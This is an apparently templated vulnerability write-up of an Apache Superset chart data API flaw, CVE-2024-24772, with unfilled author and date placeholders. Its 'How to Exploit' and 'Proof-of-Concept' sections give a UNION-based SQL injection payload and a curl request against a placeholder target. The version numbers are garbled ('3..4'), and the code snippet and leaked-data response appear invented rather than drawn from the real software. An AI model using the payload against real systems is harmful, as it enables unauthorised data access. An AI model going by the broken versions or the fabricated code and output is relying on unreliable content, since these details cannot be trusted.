CVE-2024-24772 - Guest User Vulnerability in Apache Superset Chart Data REST API Leads to Information Disclosure

Author: [Your_Name_here]
*<br>Date: [Date_here]<br>*
Summary: Apache Superset is vulnerable to an information disclosure issue where a guest user could exploit an oversight in the chart data REST API, leading to the leakage of sensitive data. This post explains the vulnerability details, steps to reproduce it, links to original references and the recommended solution.

===

Apache Superset is an open-source data analytics and visualization platform that helps users transform raw data into insightful, comprehensible visualizations. It comes powered by a robust set of features, including support for various analytics database backends. To make data easily accessible, Apache Superset offers a set of REST APIs which can be used to programmatically interact with the server's data and functions.

However, following the CVE-2024-24772, a guest user could exploit the chart data REST API and send arbitrary SQL statements that, on error, could leak sensitive information from the underlying analytics database.This issue affects Apache Superset versions: before 3..4, from 3.1. before 3.1.1.

Source Code Snippet

The vulnerability stems from a lack of proper input sanitization in the chart_data API.

@expose('/chart-data', methods=['POST'])
def get_chart_data(self):
    sql_query = request.form.get('sql')
    chart_data = get_chart_data_from_sql_query(sql_query)
    return jsonify(chart_data)

How to Exploit

A guest user can send a malformed SQL query which, upon execution, returns an error message containing sensitive information from the underlying analytics database. For instance, an attacker could craft an SQL injection payload like:

1' UNION ALL SELECT NULL, CONCAT('Sensitive_Data:', table_name) FROM information_schema.tables WHERE table_schema='my_schemas'--

Proof-of-Concept

To reproduce the vulnerability, an attacker could use a simple curl command or other HTTP client tools to initiate a POST request to the affected chart_data API with the malicious SQL string:

curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "sql=<MALICIOUS_SQL_QUERY>" http://<TARGET-SUPERSET-INSTANCE>/chart-data

Upon successful execution, the response may disclose sensitive data like

{
    "error": "Unknown error: unknown_table_name",
    "info": "Sensitive_Data:users,passwords,sales_data",
    ...
}

Original References

- Apache Superset GitHub Repository
- CVE-2024-24772 Vulnerability Details
- Apache Superset Official Blog
- Recommended Patch for CVE-2024-24772

Solution

To fix this vulnerability, it is strongly recommended to upgrade Apache Superset to either version 3..4 or 3.1.1, which incorporates the patch addressing this issue. Users should keep the software up-to-date and monitor the Apache Superset project repository for any future security updates.

If you have any questions or concerns about upgrading your Apache Superset instance, please refer to the official Apache Superset documentation for assistance.

Stay up-to-date and secure your data by fixing this vulnerability as soon as possible.

Timeline

Published on: 02/28/2024 12:15:47 UTC
Last modified on: 02/28/2024 15:15:09 UTC